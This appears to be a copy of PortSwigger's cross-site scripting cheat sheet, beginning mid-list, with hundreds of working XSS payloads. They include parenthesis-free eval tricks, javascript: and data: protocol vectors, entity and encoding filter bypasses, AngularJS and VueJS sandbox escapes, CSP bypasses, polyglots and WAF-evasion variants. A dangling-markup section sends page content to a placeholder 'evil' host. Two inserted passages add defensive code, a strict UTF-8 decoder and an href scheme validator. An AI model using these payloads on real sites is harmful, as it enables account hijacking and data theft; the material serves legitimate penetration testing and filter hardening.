<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without dots
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect
<script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings
<script>location=name</script>
No parentheses, using template strings
<script>alert`1`</script>
No parentheses, using template strings and location.hash
<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location.hash
<script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
Protocols
Iframe src attribute with JavaScript protocol
<iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">
A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol (shown here with a tab)
<a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (shown here with a tab)
<a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x=20 y=20>XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using from and to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src
<script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol, rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah
Button and formaction
<form><button formaction=javascript:alert(1)>XSS
Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using the srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
The download attribute can save a copy of the current web page
<a href=# download="filename.html">Test</a>
Disable the referrer using referrerpolicy
<img referrerpolicy=no-referrer src=//portswigger-labs.net>
Set window.name via a parameter on the window.open function
<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via the name attribute in an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via the target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via the target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via the usemap attribute in an <img> tag
<img src=validimage.png width=10 height=10 usemap=#xss><map name=xss><area shape=rect coords=0,0,82,126 target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via the target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type=submit value="XSS via target in a form"></form>
Set window.name via the formtarget attribute in an <input> tag of type submit
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type=submit formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via the formtarget attribute in an <input> tag of type image
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type=image src=validimage.png formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain
<meta http-equiv=refresh content="0; url=//portswigger-labs.net">
Meta charset attribute UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7 via Content-Type
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable the referrer
<meta name="referrer" content="no-referrer">
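The UTF-7 vectors above and the "Overlong UTF-8" vector at the top of the Encoding section below both depend on the receiver decoding bytes more liberally than the filter that inspected them. For UTF-7 the defence is to declare the charset on every response; for overlong UTF-8 it is to decode strictly. The following is an added example, not code from the cheat sheet or from PortSwigger: a small UTF-8 decoder with a strict mode that rejects the overlong, surrogate and out-of-range forms RFC 3629 forbids, beside a lenient mode that shows how C0 BC (and the 3-, 4-, 5- and 6-byte forms from the same entry) would otherwise become "<". The helper `percentBytes` is assumed here purely to turn the cheat sheet's `%C0%BC` notation into bytes.

```javascript
// Added example: strict vs. lenient UTF-8 decoding of the overlong forms
// listed in the Encoding section. Strict decoding returns null so a request
// can be rejected instead of silently normalised into "<".

// Turn a purely percent-encoded string such as "%C0%BC" into bytes (constructed
// helper for the examples; not a general URL decoder).
function percentBytes(s) {
  return s.split('%').slice(1).map((h) => parseInt(h, 16));
}

// Decode an array of byte values as UTF-8. With strict=true (the default) the
// decoder enforces RFC 3629: shortest form only, at most 4 bytes, no surrogates.
// With strict=false it behaves like the permissive decoders that the overlong
// trick relies on, and will happily yield "<" for C0 BC.
function decodeUtf8(bytes, strict = true) {
  let out = '';
  for (let i = 0; i < bytes.length; ) {
    const b0 = bytes[i];
    let need, cp, min;
    if (b0 < 0x80) { out += String.fromCharCode(b0); i++; continue; }
    else if ((b0 & 0xe0) === 0xc0) { need = 1; cp = b0 & 0x1f; min = 0x80; }
    else if ((b0 & 0xf0) === 0xe0) { need = 2; cp = b0 & 0x0f; min = 0x800; }
    else if ((b0 & 0xf8) === 0xf0) { need = 3; cp = b0 & 0x07; min = 0x10000; }
    else if ((b0 & 0xfc) === 0xf8) { need = 4; cp = b0 & 0x03; min = 0x200000; }
    else if ((b0 & 0xfe) === 0xfc) { need = 5; cp = b0 & 0x01; min = 0x4000000; }
    else return null;                              // stray continuation byte or 0xFE/0xFF
    if (strict && need > 3) return null;           // 5- and 6-byte forms were removed by RFC 3629
    if (i + need >= bytes.length) return null;     // truncated sequence
    for (let k = 1; k <= need; k++) {
      const b = bytes[i + k];
      if ((b & 0xc0) !== 0x80) return null;        // not a 10xxxxxx continuation byte
      cp = (cp << 6) | (b & 0x3f);
    }
    if (strict && cp < min) return null;           // overlong: a shorter encoding exists
    if (strict && cp >= 0xd800 && cp <= 0xdfff) return null; // UTF-16 surrogate, invalid in UTF-8
    if (cp > 0x10ffff) return null;                // beyond Unicode in either mode
    out += String.fromCodePoint(cp);
    i += need + 1;
  }
  return out;
}
```

Run `decodeUtf8(percentBytes('%C0%BC'), false)` to see the lenient result `<`, and `decodeUtf8(percentBytes('%C0%BC'))` to see strict mode return null; a filter that checks for 0x3C before a lenient decoder runs is exactly what the overlong vector gets past.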
Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>
Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semicolon
<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros
<a href="&#0000106;avascript:alert(1)">XSS</a>
Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semicolon, provided the next character is not a-f0-9 (the second and third variants separate the entity from the following "a" with a tab and a newline, both of which are allowed inside the protocol)
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a	avascript:alert(1)">XSS</a> <a href="&#x6a&NewLine;avascript:alert(1)">XSS</a>
Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
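The Protocols and Encoding sections together describe the order a browser applies to an `href`: HTML character references are decoded first (decimal or hex, semicolon optional, leading zeros and letter case ignored, named references such as `&colon;` and `&Tab;` honoured), then the URL parser strips leading C0 controls and space and removes tab, LF and CR anywhere, and only then is the scheme compared case-insensitively. A filter that greps the raw attribute for `javascript:` checks the wrong representation. The following is an added example, not code from the cheat sheet: a scheme check that normalises in that same order and then allows only listed schemes. The named-reference table is a deliberately small subset; a production sanitizer would use a complete HTML5 entity table (the `he` package, for instance). The function and constant names are this example's own.

```javascript
// Added example: validate a URL attribute the way the browser will read it,
// not the way it appears in the raw HTML. Allow-listing schemes after full
// normalisation defeats every encoding variant in the Encoding section.

// Named references that matter for scheme smuggling. Subset only; in
// production use a complete HTML5 entity table.
const NAMED_REFS = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')',
  sol: '/', percnt: '%', quot: '"', lt: '<', gt: '>', amp: '&',
};

// Decode numeric references (decimal and hex, optional ';', any number of
// leading zeros, hex digits and the 'x' in any case) plus the named subset.
// Unknown names are left untouched. Named references without a ';' are
// decoded too, which over-approximates HTML but only in the safe direction.
function decodeHtmlRefs(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    }
    return name in NAMED_REFS ? NAMED_REFS[name] : m;
  });
}

// Recover the scheme the URL parser will see: strip leading \x00-\x20, drop
// tab/LF/CR anywhere (the URL spec removes them), then take the letter run
// before the first ':'. Returns '' for relative and protocol-relative URLs.
function effectiveScheme(url) {
  const cleaned = url.replace(/^[\x00-\x20]+/, '').replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : '';
}

// Allow list: relative URLs ('' scheme), http, https and mailto. Everything
// else, including javascript:, data: and vbscript:, is rejected.
const SAFE_SCHEMES = new Set(['', 'http', 'https', 'mailto']);

// True only if the attribute value, decoded as the browser decodes it, has a
// scheme on the allow list.
function isSafeHref(attrValue) {
  return SAFE_SCHEMES.has(effectiveScheme(decodeHtmlRefs(attrValue)));
}
```

The check is attribute-level: it assumes the value has already been extracted from the HTML by a real parser rather than by a regular expression, and it must be applied to every URL-bearing attribute (`href`, `src`, `data`, `action`, `formaction`, `xlink:href`), since the Protocols section shows that the JavaScript scheme is accepted in all of them.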
Obfuscation
Data protocol inside script src with base64
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)')}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through the src attribute
<img src="//evil? <image src="//evil?
Video using the track element
<video><track default src="//evil?
Video using the source element and src attribute
<video><source src="//evil?
Audio using the source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%;" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%;" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to an external site
<form><button formaction="//evil">XSS</button><textarea name=x>
Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action="//evil/" target='
Pass markup data through window.name using base target
<a href="http://subdomain1.portswigger-labs.net/dangling_markup/name.html"><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using iframe window name to pass data from the page
<iframe src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using object window name to pass data from the page
<object data="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using frame window name to pass data from the page
<frameset><frame src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Overwrite the type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string, string concatenation (window)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self)
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this)
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top)
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent)
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames)
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis)
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this)
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top)
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent)
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames)
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis)
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self)
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this)
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top)
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent)
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames)
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis)
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
